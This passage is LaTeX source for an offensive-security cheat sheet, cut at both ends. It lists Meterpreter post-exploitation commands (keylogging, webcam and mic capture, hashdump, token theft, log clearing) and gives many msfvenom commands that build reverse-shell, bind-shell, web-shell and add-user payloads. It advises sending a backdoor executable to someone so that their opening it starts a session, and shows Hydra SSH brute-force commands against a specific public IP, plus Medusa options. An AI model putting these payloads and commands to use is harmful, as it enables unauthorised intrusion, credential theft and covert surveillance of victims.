Help menu \newline % Row Count 6 (+ 1) background Backgrounds the current session \newline % Row Count 8 (+ 2) bg Alias for background \newline % Row Count 10 (+ 2) bgkill Kills a background meterpreter script \newline % Row Count 12 (+ 2) bglist Lists running background scripts \newline % Row Count 14 (+ 2) bgrun Executes a meterpreter script as a background thread \newline % Row Count 16 (+ 2) channel Displays information or control active channels \newline % Row Count 18 (+ 2) close Closes a channel \newline % Row Count 19 (+ 1) \seqsplit{disable\_unicode\_encoding} Disables encoding of unicode strings \newline % Row Count 21 (+ 2) \seqsplit{enable\_unicode\_encoding} Enables encoding of unicode strings \newline % Row Count 23 (+ 2) exit Terminate the meterpreter session \newline % Row Count 25 (+ 2) get\_timeouts Get the current session timeout values \newline % Row Count 27 (+ 2) guid Get the session GUID \newline % Row Count 29 (+ 2) help Help menu \newline % Row Count 30 (+ 1) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{ info Displays information about a Post module \newline % Row Count 2 (+ 2) irb Open an interactive Ruby shell on the current session \newline % Row Count 4 (+ 2) load Load one or more meterpreter extensions \newline % Row Count 6 (+ 2) machine\_id Get the MSF ID of the machine attached to the session \newline % Row Count 8 (+ 2) migrate Migrate the server to another process \newline % Row Count 10 (+ 2) pivot Manage pivot listeners \newline % Row Count 12 (+ 2) pry Open the Pry debugger on the current session \newline % Row Count 14 (+ 2) quit Terminate the meterpreter session \newline % Row Count 16 (+ 2) read Reads data from a channel \newline % Row Count 18 (+ 2) resource Run the commands stored in a file \newline % Row Count 20 
(+ 2) run Executes a meterpreter script or Post module \newline % Row Count 22 (+ 2) secure (Re)Negotiate TLV packet encryption on the session \newline % Row Count 24 (+ 2) sessions Quickly switch to another session \newline % Row Count 26 (+ 2) set\_timeouts Set the current session timeout values \newline % Row Count 28 (+ 2) sleep Force Meterpreter to go quiet, then re-establish session. \newline % Row Count 30 (+ 2) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{ transport Change the current transport mechanism \newline % Row Count 2 (+ 2) use Deprecated alias for "load" \newline % Row Count 4 (+ 2) uuid Get the UUID for the current session \newline % Row Count 6 (+ 2) write Writes data to a channel \newline % Row Count 8 (+ 2) Stdapi: File system Commands \newline % Row Count 9 (+ 1) \seqsplit{============================} \newline % Row Count 10 (+ 1) Command Description \newline % Row Count 11 (+ 1) -{}-{}-{}-{}-{}-{}- -{}-{}-{}-{}-{}-{}-{}-{}-{}-- \newline % Row Count 12 (+ 1) cat Read the contents of a file to the screen \newline % Row Count 14 (+ 2) cd Change directory \newline % Row Count 15 (+ 1) checksum Retrieve the checksum of a file \newline % Row Count 16 (+ 1) cp Copy source to destination \newline % Row Count 17 (+ 1) dir List files (alias for ls) \newline % Row Count 18 (+ 1) download Download a file or directory \newline % Row Count 19 (+ 1) edit Edit a file \newline % Row Count 20 (+ 1) getlwd Print local working directory \newline % Row Count 21 (+ 1) getwd Print working directory \newline % Row Count 22 (+ 1) lcd Change local working directory \newline % Row Count 23 (+ 1) lls List local files \newline % Row Count 24 (+ 1) lpwd Print local working directory \newline % Row Count 25 (+ 1) ls List files \newline % Row Count 26 (+ 1) mkdir 
Make directory \newline % Row Count 27 (+ 1) mv Move source to destination \newline % Row Count 28 (+ 1) pwd Print working directory \newline % Row Count 29 (+ 1) rm Delete the specified file \newline % Row Count 30 (+ 1) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{ rmdir Remove directory \newline % Row Count 1 (+ 1) search Search for files \newline % Row Count 2 (+ 1) show\_mount List all mount points/logical drives \newline % Row Count 4 (+ 2) upload Upload a file or directory \newline % Row Count 5 (+ 1) Stdapi: Networking Commands \newline % Row Count 6 (+ 1) \seqsplit{===========================} \newline % Row Count 7 (+ 1) Command Description \newline % Row Count 8 (+ 1) -{}-{}-{}-{}-{}-{}- -{}-{}-{}-{}-{}-{}-{}-{}-{}-- \newline % Row Count 9 (+ 1) arp Display the host ARP cache \newline % Row Count 10 (+ 1) getproxy Display the current proxy configuration \newline % Row Count 12 (+ 2) ifconfig Display interfaces \newline % Row Count 13 (+ 1) ipconfig Display interfaces \newline % Row Count 14 (+ 1) netstat Display the network connections \newline % Row Count 15 (+ 1) portfwd Forward a local port to a remote service \newline % Row Count 17 (+ 2) resolve Resolve a set of host names on the target \newline % Row Count 19 (+ 2) route View and modify the routing table \newline % Row Count 21 (+ 2) Stdapi: User interface Commands \newline % Row Count 22 (+ 1) Command Description \newline % Row Count 23 (+ 1) -{}-{}-{}-{}-{}-{}- -{}-{}-{}-{}-{}-{}-{}-{}-{}-- \newline % Row Count 24 (+ 1) enumdesktops List all accessible desktops and window stations \newline % Row Count 26 (+ 2) getdesktop Get the current meterpreter desktop \newline % Row Count 28 (+ 2) idletime Returns the number of seconds the remote user has been idle \newline % Row Count 30 (+ 2) } 
\tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{ keyboard\_send Send keystrokes \newline % Row Count 1 (+ 1) keyevent Send key events \newline % Row Count 2 (+ 1) keyscan\_dump Dump the keystroke buffer \newline % Row Count 3 (+ 1) keyscan\_start Start capturing keystrokes \newline % Row Count 4 (+ 1) keyscan\_stop Stop capturing keystrokes \newline % Row Count 5 (+ 1) mouse Send mouse events \newline % Row Count 6 (+ 1) screenshare Watch the remote user's desktop in real time \newline % Row Count 8 (+ 2) screenshot Grab a screenshot of the interactive desktop \newline % Row Count 10 (+ 2) setdesktop Change the meterpreters current desktop \newline % Row Count 12 (+ 2) uictl Control some of the user interface components \newline % Row Count 14 (+ 2) Stdapi: System Commands \newline % Row Count 15 (+ 1) ======================= \newline % Row Count 16 (+ 1) Command Description \newline % Row Count 17 (+ 1) -{}-{}-{}-{}-{}-{}- -{}-{}-{}-{}-{}-{}-{}-{}-{}-- \newline % Row Count 18 (+ 1) clearev Clear the event log \newline % Row Count 19 (+ 1) drop\_token Relinquishes any active impersonation token. 
\newline % Row Count 21 (+ 2) execute Execute a command \newline % Row Count 22 (+ 1) getenv Get one or more environment variable values \newline % Row Count 24 (+ 2) getpid Get the current process identifier \newline % Row Count 26 (+ 2) getprivs Attempt to enable all privileges available to the current process \newline % Row Count 28 (+ 2) getsid Get the SID of the user that the server is running as \newline % Row Count 30 (+ 2) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{ getuid Get the user that the server is running as \newline % Row Count 2 (+ 2) kill Terminate a process \newline % Row Count 3 (+ 1) localtime Displays the target system's local date and time \newline % Row Count 5 (+ 2) pgrep Filter processes by name \newline % Row Count 6 (+ 1) pkill Terminate processes by name \newline % Row Count 7 (+ 1) ps List running processes \newline % Row Count 8 (+ 1) reboot Reboots the remote computer \newline % Row Count 9 (+ 1) reg Modify and interact with the remote registry \newline % Row Count 11 (+ 2) rev2self Calls RevertToSelf() on the remote machine \newline % Row Count 13 (+ 2) shell Drop into a system command shell \newline % Row Count 15 (+ 2) shutdown Shuts down the remote computer \newline % Row Count 16 (+ 1) steal\_token Attempts to steal an impersonation token from the target process \newline % Row Count 18 (+ 2) suspend Suspends or resumes a list of processes \newline % Row Count 20 (+ 2) sysinfo Gets information about the remote system, such as OS \newline % Row Count 22 (+ 2) Stdapi: Webcam Commands \newline % Row Count 23 (+ 1) ======================= \newline % Row Count 24 (+ 1) Command Description \newline % Row Count 25 (+ 1) -{}-{}-{}-{}-{}-{}- -{}-{}-{}-{}-{}-{}-{}-{}-{}-- \newline % Row Count 26 (+ 1) record\_mic Record audio 
from the default microphone for X seconds \newline % Row Count 28 (+ 2) webcam\_chat Start a video chat \newline % Row Count 29 (+ 1) webcam\_list List webcams \newline % Row Count 30 (+ 1) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{ webcam\_snap Take a snapshot from the specified webcam \newline % Row Count 2 (+ 2) webcam\_stream Play a video stream from the specified webcam \newline % Row Count 4 (+ 2) Stdapi: Audio Output Commands \newline % Row Count 5 (+ 1) \seqsplit{=============================} \newline % Row Count 6 (+ 1) Command Description \newline % Row Count 7 (+ 1) -{}-{}-{}-{}-{}-{}- -{}-{}-{}-{}-{}-{}-{}-{}-{}-- \newline % Row Count 8 (+ 1) play play a waveform audio file (.wav) on the target system \newline % Row Count 10 (+ 2) Priv: Elevate Commands \newline % Row Count 11 (+ 1) ====================== \newline % Row Count 12 (+ 1) Command Description \newline % Row Count 13 (+ 1) -{}-{}-{}-{}-{}-{}- -{}-{}-{}-{}-{}-{}-{}-{}-{}-- \newline % Row Count 14 (+ 1) getsystem Attempt to elevate your privilege to that of local system. 
\newline % Row Count 16 (+ 2)
Priv: Password database Commands \newline % Row Count 17 (+ 1)
\seqsplit{================================} \newline % Row Count 18 (+ 1)
Command Description \newline % Row Count 19 (+ 1)
-{}-{}-{}-{}-{}-{}- -{}-{}-{}-{}-{}-{}-{}-{}-{}-- \newline % Row Count 20 (+ 1)
hashdump Dumps the contents of the SAM database \newline % Row Count 22 (+ 2)
Priv: Timestomp Commands \newline % Row Count 23 (+ 1)
======================== \newline % Row Count 24 (+ 1)
Command Description \newline % Row Count 25 (+ 1)
-{}-{}-{}-{}-{}-{}- -{}-{}-{}-{}-{}-{}-{}-{}-{}-- \newline % Row Count 26 (+ 1)
timestomp Manipulate file MACE attributes \newline % Row Count 27 (+ 1)
Creating an executable backdoor with Metasploit: \newline % Row Count 28 (+ 1)
"msfvenom -p \seqsplit{windows/meterpreter/reverse\_tcp} LHOST=192.168.3.141 LPORT=4444 -f exe -o payload.exe" \newline % Row Count 30 (+ 2)
} \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{The backdoor executable (payload.exe in the command above) is saved in the directory from which you ran the command.
Upload this file to GitHub or send it to someone, once they open it, your meterpreter session will start \newline % Row Count 4 (+ 4) LHOST= Your IP \newline % Row Count 5 (+ 1) RHOST= Target IP \newline % Row Count 6 (+ 1) List payloads: \newline % Row Count 7 (+ 1) "msfvenom -l" \newline % Row Count 8 (+ 1) Linux Meterpreter Reverse Shell: \newline % Row Count 9 (+ 1) "msfvenom -p \seqsplit{linux/x86/meterpreter/reverse\_tcp} LHOST=\textless{}Local IP Address\textgreater{} LPORT=\textless{}Local Port\textgreater{} -f elf \textgreater{} shell.elf" \newline % Row Count 12 (+ 3) Linux Bind Meterpreter Shell: \newline % Row Count 13 (+ 1) "msfvenom -p \seqsplit{linux/x86/meterpreter/bind\_tcp} RHOST=\textless{}Remote IP Address\textgreater{} LPORT=\textless{}Local Port\textgreater{} -f elf \textgreater{} bind.elf" \newline % Row Count 16 (+ 3) Linux Bind Shell: \newline % Row Count 17 (+ 1) "msfvenom -p generic/shell\_bind\_tcp RHOST=\textless{}Remote IP Address\textgreater{} LPORT=\textless{}Local Port\textgreater{} -f elf \textgreater{} term.elf" \newline % Row Count 20 (+ 3) Windows Meterpreter Reverse TCP Shell: \newline % Row Count 21 (+ 1) "msfvenom -p \seqsplit{windows/meterpreter/reverse\_tcp} LHOST=\textless{}Local IP Address\textgreater{} LPORT=\textless{}Local Port\textgreater{} -f exe \textgreater{} shell.exe" \newline % Row Count 24 (+ 3) Windows Reverse TCP Shell: \newline % Row Count 25 (+ 1) "msfvenom -p \seqsplit{windows/shell/reverse\_tcp} LHOST=\textless{}Local IP Address\textgreater{} LPORT=\textless{}Local Port\textgreater{} -f exe \textgreater{} shell.exe" \newline % Row Count 28 (+ 3) Windows Encoded Meterpreter Windows Reverse Shell: \newline % Row Count 30 (+ 2) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{ "msfvenom -p 
\seqsplit{windows/meterpreter/reverse\_tcp} -e shikata\_ga\_nai -i 3 -f exe \textgreater{} encoded.exe" \newline % Row Count 2 (+ 2) Mac Reverse Shell: \newline % Row Count 3 (+ 1) "msfvenom -p \seqsplit{osx/x86/shell\_reverse\_tcp} LHOST=\textless{}Local IP Address\textgreater{} LPORT=\textless{}Local Port\textgreater{} -f macho \textgreater{} shell.macho" \newline % Row Count 6 (+ 3) Mac Bind Shell: \newline % Row Count 7 (+ 1) "msfvenom -p osx/x86/shell\_bind\_tcp RHOST=\textless{}Remote IP Address\textgreater{} LPORT=\textless{}Local Port\textgreater{} -f macho \textgreater{} bind.macho" \newline % Row Count 10 (+ 3) Web Payloads: \newline % Row Count 11 (+ 1) PHP Meterpreter Reverse TCP \newline % Row Count 12 (+ 1) msfvenom -p \seqsplit{php/meterpreter\_reverse\_tcp} LHOST=\textless{}Local IP Address\textgreater{} LPORT=\textless{}Local Port\textgreater{} -f raw \textgreater{} shell.php \newline % Row Count 15 (+ 3) cat shell.php | pbcopy \&\& echo '\textless{}?php ' | tr -d '\textbackslash{}n' \textgreater{} shell.php \&\& pbpaste \textgreater{}\textgreater{} shell.php \newline % Row Count 17 (+ 2) ASP Meterpreter Reverse TCP \newline % Row Count 18 (+ 1) msfvenom -p \seqsplit{windows/meterpreter/reverse\_tcp} LHOST=\textless{}Local IP Address\textgreater{} LPORT=\textless{}Local Port\textgreater{} -f asp \textgreater{} shell.asp \newline % Row Count 21 (+ 3) JSP Java Meterpreter Reverse TCP \newline % Row Count 22 (+ 1) msfvenom -p \seqsplit{java/jsp\_shell\_reverse\_tcp} LHOST=\textless{}Local IP Address\textgreater{} LPORT=\textless{}Local Port\textgreater{} -f raw \textgreater{} shell.jsp \newline % Row Count 25 (+ 3) WAR \newline % Row Count 26 (+ 1) msfvenom -p \seqsplit{java/jsp\_shell\_reverse\_tcp} LHOST=\textless{}Local IP Address\textgreater{} LPORT=\textless{}Local Port\textgreater{} -f war \textgreater{} shell.war \newline % Row Count 29 (+ 3) Scripting Payloads \newline % Row Count 30 (+ 1) } \tn \end{tabularx} \par\addvspace{1.3em} 
\begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{Python Reverse Shell \newline % Row Count 1 (+ 1) msfvenom -p cmd/unix/reverse\_python LHOST=\textless{}Local IP Address\textgreater{} LPORT=\textless{}Local Port\textgreater{} -f raw \textgreater{} shell.py \newline % Row Count 3 (+ 2) Bash Unix Reverse Shell \newline % Row Count 4 (+ 1) msfvenom -p cmd/unix/reverse\_bash LHOST=\textless{}Local IP Address\textgreater{} LPORT=\textless{}Local Port\textgreater{} -f raw \textgreater{} shell.sh \newline % Row Count 6 (+ 2) Perl Unix Reverse shell \newline % Row Count 7 (+ 1) msfvenom -p cmd/unix/reverse\_perl LHOST=\textless{}Local IP Address\textgreater{} LPORT=\textless{}Local Port\textgreater{} -f raw \textgreater{} shell.pl \newline % Row Count 9 (+ 2) Shellcode \newline % Row Count 10 (+ 1) Windows Meterpreter Reverse TCP Shellcode \newline % Row Count 11 (+ 1) msfvenom -p \seqsplit{windows/meterpreter/reverse\_tcp} LHOST=\textless{}Local IP Address\textgreater{} LPORT=\textless{}Local Port\textgreater{} -f \textless{}language\textgreater{} \newline % Row Count 14 (+ 3) Linux Meterpreter Reverse TCP Shellcode \newline % Row Count 15 (+ 1) msfvenom -p \seqsplit{linux/x86/meterpreter/reverse\_tcp} LHOST=\textless{}Local IP Address\textgreater{} LPORT=\textless{}Local Port\textgreater{} -f \textless{}language\textgreater{} \newline % Row Count 18 (+ 3) Mac Reverse TCP Shellcode \newline % Row Count 19 (+ 1) msfvenom -p \seqsplit{osx/x86/shell\_reverse\_tcp} LHOST=\textless{}Local IP Address\textgreater{} LPORT=\textless{}Local Port\textgreater{} -f \textless{}language\textgreater{} \newline % Row Count 21 (+ 2) Create User \newline % Row Count 22 (+ 1) msfvenom -p windows/adduser USER=hacker PASS=Hacker123\$ -f exe \textgreater{} adduser.exe \newline % Row Count 24 (+ 2) Metasploit Handler: \newline % Row 
Count 25 (+ 1) use exploit/multi/handler \newline % Row Count 26 (+ 1) set PAYLOAD \textless{}Payload name\textgreater{} \newline % Row Count 27 (+ 1) Set RHOST \textless{}Remote IP\textgreater{} \newline % Row Count 28 (+ 1) set LHOST \textless{}Local IP\textgreater{} \newline % Row Count 29 (+ 1) set LPORT \textless{}Local Port\textgreater{} \newline % Row Count 30 (+ 1) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{ Run \newline % Row Count 1 (+ 1) msf\textgreater{} use multi/handler \newline % Row Count 2 (+ 1) msf exploit(handler) \textgreater{} set RHOST \textless{}remote IP\textgreater{} \newline % Row Count 3 (+ 1) msf exploit(handler) \textgreater{} set payload \seqsplit{windows/meterpreter/reverse\_tcp} \newline % Row Count 5 (+ 2) msf exploit(handler) \textgreater{} set LHOST \textless{}Listening\_IP\textgreater{} \newline % Row Count 6 (+ 1) msf exploit(handler) \textgreater{} set LPORT \textless{}Listening\_Port\textgreater{} \newline % Row Count 7 (+ 1) msf exploit(handler) \textgreater{} exploit \newline % Row Count 8 (+ 1) {[}*{]} Started reverse handler on 192.168.75.35:4444 \newline % Row Count 9 (+ 1) {[}*{]} Starting the payload handler… \newline % Row Count 10 (+ 1) SSH User Enumeration in Metasploit: \newline % Row Count 11 (+ 1) \seqsplit{AUXILIARY/SCANNER/SSH/SSH\_ENUMUSERS} \newline % Row Count 12 (+ 1) \textgreater{}set RHOSTS \textless{}target\textgreater{} \newline % Row Count 13 (+ 1) \textgreater{}set USERNAME admin \newline % Row Count 14 (+ 1) \textgreater{}run \newline % Row Count 15 (+ 1) \seqsplit{===========================================================================================================================} \newline % Row Count 18 (+ 3) Netcat: \newline % Row Count 19 (+ 1) Basic Chat Server: \newline % Row 
Count 20 (+ 1)
On your first machine type: \newline % Row Count 21 (+ 1)
"nc -l 2222" \newline % Row Count 22 (+ 1)
This will simply listen on port 2222 for any incoming data. On another machine run: \newline % Row Count 24 (+ 2)
"nc 192.168.0.31 2222" \newline % Row Count 25 (+ 1)
Next, type anything at all, e.g. "hello world!", and you'll see it echoed in the listener's shell. Any text entered into either shell is also displayed on the other machine. \newline % Row Count 29 (+ 4)
File transfer - from the server side (listener): \newline % Row Count 30 (+ 1)
} \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{ We'll transfer a file from one box (the server) to another box (the client): as soon as the server receives a connection, the file is transferred. On the machine where the file exists, run the following command: \newline % Row Count 5 (+ 5)
"nc -l 2222 \textless{} filename \textgreater{}" \newline % Row Count 6 (+ 1)
On the box where you'd like to receive the file, run: \newline % Row Count 8 (+ 2)
"nc 192.168.0.31 2222 \textgreater{} any\_file\_name" \newline % Row Count 9 (+ 1)
Note that if you don't redirect the data to any\_file\_name, it will just be displayed in the shell at the receiving end. The receiving file name any\_file\_name can be anything (but is normally the same as the original).
\newline % Row Count 14 (+ 5)
If you want to append the contents of filename to an already existing any\_file\_name, use this instead: \newline % Row Count 17 (+ 3)
"nc 192.168.0.31 2222 \textgreater{}\textgreater{} any\_file\_name" \newline % Row Count 18 (+ 1)
Note the '\textgreater{}\textgreater{}' rather than just a single '\textgreater{}' (the '\textgreater{}\textgreater{}' appends while the '\textgreater{}' overwrites). \newline % Row Count 20 (+ 2)
File transfer - from the client side \newline % Row Count 21 (+ 1)
To transfer a file in the opposite direction use: \newline % Row Count 22 (+ 1)
"nc -l 2222 \textgreater{} file\_copy" \newline % Row Count 23 (+ 1)
On the client side (the sender in this case) use: \newline % Row Count 24 (+ 1)
"cat file\_to\_send | nc 192.168.0.31 2222" \newline % Row Count 25 (+ 1)
To keep the listener open for further data, use the -k option: \newline % Row Count 27 (+ 2)
"nc -lk 2222 \textgreater{}\textgreater{} file" \newline % Row Count 28 (+ 1)
\seqsplit{===========================================================================================================================} \newline % Row Count 31 (+ 3)
} \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{Simple Python HTTP server for transferring a file: \newline % Row Count 2 (+ 2)
sudo python3 -m http.server 80 \newline % Row Count 3 (+ 1)
\seqsplit{===========================================================================================================================} \newline % Row Count 6 (+ 3)
Crunch Wordlist: \newline % Row Count 7 (+ 1)
crunch 4 4 012345abcdef -o Documents/pass.txt \newline % Row Count 8 (+ 1)
\seqsplit{===========================================================================================================================} \newline
% Row Count 11 (+ 3) Hydra: \newline % Row Count 12 (+ 1) Install hydra with the following commands: \newline % Row Count 13 (+ 1) \$ git clone \seqsplit{https://github.com/vanhauser-thc/thc-hydra.git} \newline % Row Count 15 (+ 2) \$ cd thc-hydra/ \newline % Row Count 16 (+ 1) \$ ./configure \newline % Row Count 17 (+ 1) \$ make \newline % Row Count 18 (+ 1) \$ make install \newline % Row Count 19 (+ 1) hydra -l admin -P \seqsplit{/home/kali/htb/nineveh/10k} 10.10.10.43 http-post-form "/department/login.php:username=\textasciicircum{}user\textasciicircum{}\&password=\textasciicircum{}PASS\textasciicircum{}:Invalid" -t 64 \newline % Row Count 22 (+ 3) hydra -l root -p admin 69.167.51.201 -t 4 ssh \newline % Row Count 23 (+ 1) hydra -l root -P \seqsplit{/usr/share/wordlists/metasploit/piata\_ssh\_userpass}.txt 69.167.51.201 -t 4 \newline % Row Count 25 (+ 2) \seqsplit{===========================================================================================================================} \newline % Row Count 28 (+ 3) Medusa: \newline % Row Count 29 (+ 1) "medusa -h 192.168.1.1 -u "admin" -P hugewordlist.txt -M http" \newline % Row Count 31 (+ 2) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{ -h {[}TARGET{]} \newline % Row Count 1 (+ 1) Target hostname or IP address. \newline % Row Count 2 (+ 1) -H {[}FILE{]} \newline % Row Count 3 (+ 1) Reads target specifications from the file specified rather than from the command line. The file should contain a list separated by newlines. \newline % Row Count 6 (+ 3) -u {[}TARGET{]} \newline % Row Count 7 (+ 1) Target username. \newline % Row Count 8 (+ 1) -U {[}FILE{]} \newline % Row Count 9 (+ 1) Reads target usernames from the file specified rather than from the command line. 
The file should contain a list separated by newlines. \newline % Row Count 12 (+ 3) -p {[}TARGET{]} \newline % Row Count 13 (+ 1) Target password. \newline % Row Count 14 (+ 1) -P {[}FILE{]} \newline % Row Count 15 (+ 1) Reads target passwords from the file specified rather than from the command line. The file should contain a list separated by newlines. \newline % Row Count 18 (+ 3) -C {[}FILE{]} \newline % Row Count 19 (+ 1) File containing combo entries. Combo files are colon separated and in the following format: host:user:password. If any of the three fields are left empty, the respective information should be provided either as a single global value or as a list in a file. \newline % Row Count 25 (+ 6) -O {[}FILE{]} \newline % Row Count 26 (+ 1) File to append log information to. Medusa will log all accounts credentials found to be valid or cause an unknown error. It will also log the start and stop times of an audit, along with the calling parameters. \newline % Row Count 31 (+ 5) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{-e {[}n/s/ns{]} \newline % Row Count 1 (+ 1) Additional password checks ({[}n{]} No Password, {[}s{]} Password = Username). If both options are being used, they should be specified together ("-e ns"). If only a single option is being called use either "-e n" or "-e s". \newline % Row Count 6 (+ 5) -M {[}TEXT{]} \newline % Row Count 7 (+ 1) Name of the module to execute (without the .mod extension). \newline % Row Count 9 (+ 2) -m {[}TEXT{]} \newline % Row Count 10 (+ 1) Parameter to pass to the module. This can be passed multiple times with a different parameter each time and they will all be sent to the module (i.e. -m Param1 -m Param2, etc.) \newline % Row Count 14 (+ 4) -d \newline % Row Count 15 (+ 1) Dump all known modules. 
\newline % Row Count 16 (+ 1)
-n {[}NUM{]} \newline % Row Count 17 (+ 1)
Use for non-default TCP port number. \newline % Row Count 18 (+ 1)
-s \newline % Row Count 19 (+ 1)
Enable SSL. \newline % Row Count 20 (+ 1)
-g {[}NUM{]} \newline % Row Count 21 (+ 1)
Give up after trying to connect for NUM seconds (default 3). \newline % Row Count 23 (+ 2)
-r {[}NUM{]} \newline % Row Count 24 (+ 1)
Sleep NUM seconds between retry attempts (default 3). \newline % Row Count 26 (+ 2)
-R {[}NUM{]} \newline % Row Count 27 (+ 1)
Attempt NUM retries before giving up. The total number of attempts will be NUM + 1. \newline % Row Count 29 (+ 2)
-t {[}NUM{]} \newline % Row Count 30 (+ 1)
} \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{Total number of logins to be tested concurrently. It should be noted that roughly t x T threads could be running at any one time. 381 appears to be the limit on my fairly boring Gentoo Linux host. \newline % Row Count 4 (+ 4)
-T {[}NUM{]} \newline % Row Count 5 (+ 1)
Total number of hosts to be tested concurrently. \newline % Row Count 6 (+ 1)
-L \newline % Row Count 7 (+ 1)
Parallelize logins using one username per thread. The default is to process the entire username before proceeding. \newline % Row Count 10 (+ 3)
-f \newline % Row Count 11 (+ 1)
Stop scanning a host after the first valid username/password is found. \newline % Row Count 13 (+ 2)
-F \newline % Row Count 14 (+ 1)
Stop the audit after the first valid username/password is found on any host. \newline % Row Count 16 (+ 2)
-b \newline % Row Count 17 (+ 1)
Suppress startup banner. \newline % Row Count 18 (+ 1)
-q \newline % Row Count 19 (+ 1)
Display module's usage information. This should be used in conjunction with the "-M" option. For example, "medusa -M smbnt -q".
\newline % Row Count 22 (+ 3) -v {[}NUM{]} \newline % Row Count 23 (+ 1) Verbose level {[}0 - 6 (more){]}. All messages at or below the specified level will be displayed. The default level is 5. \newline % Row Count 26 (+ 3) -w {[}NUM{]} \newline % Row Count 27 (+ 1) Error debug level {[}0 - 10 (more){]}. All messages at or below the specified level will be displayed. The default level is 5. \newline % Row Count 30 (+ 3) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{-V \newline % Row Count 1 (+ 1) Display version \newline % Row Count 2 (+ 1) Available Medusa Modules: \newline % Row Count 3 (+ 1) afp.mod : Brute force module for AFP sessions \newline % Row Count 4 (+ 1) cvs.mod : Brute force module for CVS sessions \newline % Row Count 5 (+ 1) ftp.mod : Brute force module for FTP/FTPS sessions \newline % Row Count 7 (+ 2) http.mod : Brute force module for HTTP \newline % Row Count 8 (+ 1) imap.mod : Brute force module for IMAP sessions \newline % Row Count 10 (+ 2) mssql.mod : Brute force module for MSSQL sessions \newline % Row Count 12 (+ 2) mysql.mod : Brute force module for MySQL sessions \newline % Row Count 14 (+ 2) nntp.mod : Brute force module for NNTP sessions \newline % Row Count 16 (+ 2) pcanywhere.mod : Brute force module for PcAnywhere sessions \newline % Row Count 18 (+ 2) pop3.mod : Brute force module for POP3 sessions \newline % Row Count 20 (+ 2) postgres.mod : Brute force module for PostgreSQL sessions \newline % Row Count 22 (+ 2) rdp.mod : Brute force module for RDP (Microsoft Terminal Server) sessions \newline % Row Count 24 (+ 2) rexec.mod : Brute force module for REXEC sessions \newline % Row Count 26 (+ 2) rlogin.mod : 